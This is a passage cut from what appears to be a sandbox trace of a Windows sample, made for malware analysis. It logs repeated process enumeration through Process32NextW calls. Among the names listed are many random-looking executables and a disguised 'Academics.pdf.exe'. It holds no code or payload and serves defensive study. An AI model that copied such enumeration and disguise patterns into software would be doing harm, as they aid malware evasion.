(in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.419] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0307.420] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.421] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.422] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.423] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0307.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.424] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.425] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0307.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0307.426] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0307.427] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0307.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.428] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0307.429] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0307.430] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0307.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0307.431] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0307.432] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0307.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0307.433] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0307.434] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0307.435] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0307.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0307.436] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0307.437] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0307.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0307.438] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0307.439] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0307.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0307.440] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0307.441] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.442] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0307.443] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.444] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0307.445] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.446] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0307.446] CloseHandle (hObject=0x294) returned 1 [0307.447] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.447] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.447] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0307.449] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0307.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0307.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0307.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0307.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0307.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0307.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0307.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0307.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0307.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0307.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0307.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0307.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0307.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0307.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0307.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0307.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0307.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0307.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0307.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0307.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0307.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0307.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0307.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0307.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, 